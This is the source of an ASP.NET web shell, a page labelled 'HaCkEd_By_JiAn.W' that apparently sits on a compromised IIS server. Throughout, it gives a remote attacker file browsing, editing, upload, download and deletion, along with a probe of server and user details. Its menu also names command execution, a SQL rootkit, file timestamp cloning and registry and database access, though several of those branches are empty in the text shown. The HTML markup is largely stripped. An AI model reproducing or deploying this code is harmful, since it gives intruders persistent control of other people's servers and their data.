%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true" %>
<%@ Import Namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<%@ Import Namespace="Microsoft.Win32" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.OleDb" %>
<%
if request.QueryString("action")="down" and session("lake2")=1 then
downTheFile(request.QueryString("src"))
response.End()
end if
Dim hu as string = request.QueryString("action")
if hu="cmd" then
TITLE="HaCkEd_By_JiAn.W -- CMD"
elseif hu="sqlrootkit" then
TITLE="HaCkEd_By_JiAn.W -- SqlRootKit"
elseif hu="clonetime" then
TITLE="HaCkEd_By_JiAn.W -- CloneTime"
elseif hu="information" then
TITLE="HaCkEd_By_JiAn.W -- WebServerInfo"
elseif hu="reg" then
TITLE="HaCkEd_By_JiAn.W -- RegRead"
elseif hu="goto" then
TITLE="HaCkEd_By_JiAn.W -- FileManager"
elseif hu="data" then
TITLE="HaCkEd_By_JiAn.W -- ControlDataBase"
else
TITLE=request.ServerVariables("HTTP_HOST")
end if
%>
<%=TITLE%>
<%
Dim error_x as Exception
Try
if session("lake2")<>1 then
%>
8管理登录
:::... |
HaCkEd_By_JiAn.W |
|
<%
else
dim temp as string
temp=request.QueryString("action")
if temp="" then temp="goto"
select case temp
case "goto"
if request.QueryString("src")<>"" then
url=request.QueryString("src")
else
url=server.MapPath(".") & "\"
end if
call existdir(url)
dim xdir as directoryinfo
dim mydir as new DirectoryInfo(url)
dim hupo as string
dim xfile as fileinfo
%>
<%
'子目录结构
response.Write("↑回上级目录 | ")
for each xdir in mydir.getdirectories()
dim filepath as string
filepath=server.UrlEncode(url & xdir.name)
response.Write("0" & xdir.name & "")
response.Write("" & Directory.GetLastWriteTime(url & xdir.name) & " 剪切" & "-复制-删除 | ")
next
%>
|
名称 |
大小 |
修改时间 |
操作 |
<%
'文件结构
for each xfile in mydir.getfiles()
dim filepath2 as string
filepath2=server.UrlEncode(url & xfile.name)
response.Write("" & xfile.name & " | ")
response.Write("" & GetSize(xfile.length) & " | ")
response.Write("" & file.GetLastWriteTime(url & xfile.name) & " | ")
response.Write("编辑-剪切-粘贴-重命名-下载-删除 | ")
next
%>
|
<%
case "information"'探针功能
dim CIP,CP as string
if getIP()<>request.ServerVariables("REMOTE_ADDR") then
CIP=getIP()
CP=request.ServerVariables("REMOTE_ADDR")
else
CIP=request.ServerVariables("REMOTE_ADDR")
CP="None"
end if
%>
探针 |
Server IP
<%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name
<%=Environment.MachineName%>
Network Name
<%=Environment.UserDomainName.ToString()%>
User Name in this Process
<%=Environment.UserName%>
OS Version
<%=Environment.OSVersion.ToString()%>
Started Time
<%=GetStartedTime(Environment.Tickcount)%>
Hours
System Time
IIS Version
<%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS
<%=request.ServerVariables("HTTPS")%>
PATH_INFO
<%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED
<%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT
<%=request.ServerVariables("SERVER_PORT")%>
SeesionID
|
Client Infomation |
Client Proxy
Client IP
User
<%=request.ServerVariables("HTTP_USER_AGENT")%>
|
<% case "cmd" 'CMD.NET%>
<% case "sqlrootkit" 'SqlRootKit.NET%>
<%
case "del"
dim a as string
a=request.QueryString("src")
call existdir(a)
call del(a)
response.Write("")
case "copy"
call existdir(request.QueryString("src"))
session("cutboard")="" & request.QueryString("src")
response.Write("")
case "cut"
call existdir(request.QueryString("src"))
session("cutboard")="" & request.QueryString("src")
response.Write("")
case "plaster"
dim ow as integer
if request.Form("OverWrite")<>"" then ow=1
if request.Form("Cancel")<>"" then ow=2
url=request.QueryString("src")
call existdir(url)
dim d as string
d=session("cutboard")
if left(d,1)="" then
TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
TEMP2=url & replace(path.getfilename(d),"","")
if right(d,1)="\" then
call xexistdir(TEMP1,ow)
directory.move(replace(d,"",""),TEMP1 & "\")
response.Write("")
else
call xexistdir(TEMP2,ow)
file.move(replace(d,"",""),TEMP2)
response.Write("")
end if
else
TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
TEMP2=url & path.getfilename(replace(d,"",""))
if right(d,1)="\" then
call xexistdir(TEMP1,ow)
directory.createdirectory(TEMP1)
call copydir(replace(d,"",""),TEMP1 & "\")
response.Write("")
else
call xexistdir(TEMP2,ow)
file.copy(replace(d,"",""),TEMP2)
response.Write("")
end if
end if
case "upfile"
url=request.QueryString("src")
%>
<%
case "new"
url=request.QueryString("src")
%>
<%
case "edit"
dim b as string
b=request.QueryString("src")
call existdir(b)
dim myread as new streamreader(b,encoding.default)
filepath.text=b
content.text=myread.readtoend
%>
<%
myread.close
case "rename"
url=request.QueryString("src")
if request.Form("name")="" then
%>
<%
else
if Rename() then
response.Write("")
else
response.Write("")
end if
end if
case "samename"
url=request.QueryString("src")
%>
存在同名文件,如果你选NO,将自动添加一个数字前缀 |
|
返回
<%
case "clonetime"'CloneTime
time1.Text=request.QueryString("src")&"51j.aspx"
time2.Text=request.QueryString("src")
%>
<% case "reg"'ReadReg %>
<% case "data" 'DataBase%>
<%
case "logout"
session.Abandon()
response.Write("